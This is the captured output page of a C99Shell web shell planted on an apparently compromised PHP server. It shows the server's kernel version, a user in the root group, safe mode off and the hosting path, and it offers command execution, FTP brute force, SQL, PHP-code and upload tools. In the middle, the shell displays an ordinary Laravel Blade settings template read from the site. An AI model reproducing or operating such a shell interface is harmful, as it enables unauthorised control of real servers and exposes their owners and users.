!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/resources/views/customer/settings/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (6.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.customer')

@section('title','Settings')

@section('extra-css')

@endsection

@section('content')
    <section class="content-header">

    </section>
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-12 mx-auto col-sm-10">
                <!-- Custom Tabs -->
                <div class="card">

                    <div class="card-header d-flex p-0 row">
                        <h2 class="card-title p-3 col-sm-12 col-12 col-md-9 col-xl-9"><a href="{{route('customer.settings.index')}}">{{trans('customer.settings')}}</a></h2>
                        <ul class="nav nav-pills ml-auto p-2 col-12 col-sm-12 col-md-3 col-xl-3">
                            <li class="nav-item"><a class="nav-link active" href="#profile_tab" data-toggle="tab">{{trans('customer.profile')}}</a>
                            </li>
                            <li class="nav-item"><a class="nav-link" href="#password_tab" data-toggle="tab">{{trans('customer.password')}}</a>
                            </li>
                        </ul>
                    </div><!-- /.card-header -->
                    <div class="card-body">
                        <div class="tab-content">
                            <div class="tab-pane active" id="profile_tab">
                                <form method="post" role="form" id="profile_form"
                                      action="{{route('customer.settings.profile_update')}}" enctype="multipart/form-data">
                                    @csrf
                                    @include('customer.settings.profile_form')

                                    <button type="submit" class="btn btn-primary">{{trans('customer.submit')}}</button>
                                </form>
                            </div>

                            <div class="tab-pane" id="password_tab">
                                <form method="post" role="form" id="password_form"
                                      action="{{route('customer.settings.password_update')}}">
                                    @csrf
                                    @include('customer.settings.password_form')

                                    <button type="submit" class="btn btn-primary">{{trans('customer.submit')}}</button>
                                </form>
                            </div>
                            <div class="tab-pane" id="email_template_tab">
                                <form method="post" role="form" id="email_template"
                                      action="{{route('customer.settings.password_update')}}">
                                    @csrf
                                    @include('customer.settings.email_template')

                                </form>
                            </div>
                        </div>
                        <!-- /.tab-content -->
                    </div><!-- /.card-body -->
                </div>
                <!-- ./card -->


            </div>
            <!-- /.card -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->

    <div class="modal fade" id="emailTemplateModal">
        <div class="modal-dialog">
            <form action="{{route('customer.email.template')}}" method="post" id="templateForm">
                @csrf
                <input type="hidden" id="template_id" name="id">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title" id="title"></h4>
                        <button type="button" class="close" style="outline: white !important;" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                    </div>
                    <div class="modal-body">
                            <div class="form-group">
                                <label for="">{{trans('customer.subject')}}</label>
                                <input id="template_subject" value="{{old('subject')?old('subject'):''}}" type="text" class="form-control" name="subject">
                            </div>
                            <div class="form-group">
                                <label for="">{{trans('customer.status')}}</label>
                                <select id="template_status" name="status" class="form-control">
                                    <option {{old('status') && old('status')=='active'?'selected':''}} value="active">{{trans('customer.active')}}</option>
                                    <option {{old('status') && old('status')=='inactive'?'selected':''}} value="inactive">{{trans('customer.inactive')}}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label for="">{{trans('customer.template_body')}}</label>
                                <textarea id="template_body" name="body" autofocus class="form-control" cols="5" rows="5">{{old('body')?old('body'):''}}</textarea>
                                <small class="float-right" id="count"></small>
                            </div>
                            <div class="form-group">
                                @foreach(email_template_variables() as $key=>$t)
                                    <button type="button" data-name="{{$key}}" class="btn btn-sm btn-primary add_tool mt-2">{{ucfirst(str_replace('_',' ',$t))}}</button>
                                @endforeach
                            </div>

                    </div>
                    <div class="modal-footer justify-content-between">
                        <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                        <button type="submit" class="btn btn-primary">Save changes</button>
                    </div>
                </div>
            </form>
            <!-- /.modal-content -->
        </div>
        <!-- /.modal-dialog -->
    </div>

@endsection

@section('extra-scripts')
    <script src="{{asset('plugins/bs-custom-file-input/bs-custom-file-input.js')}}"></script>
    <script>
        let $validate;
    </script>
    <script src="{{asset('js/customer/settings.js')}}"></script>


@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--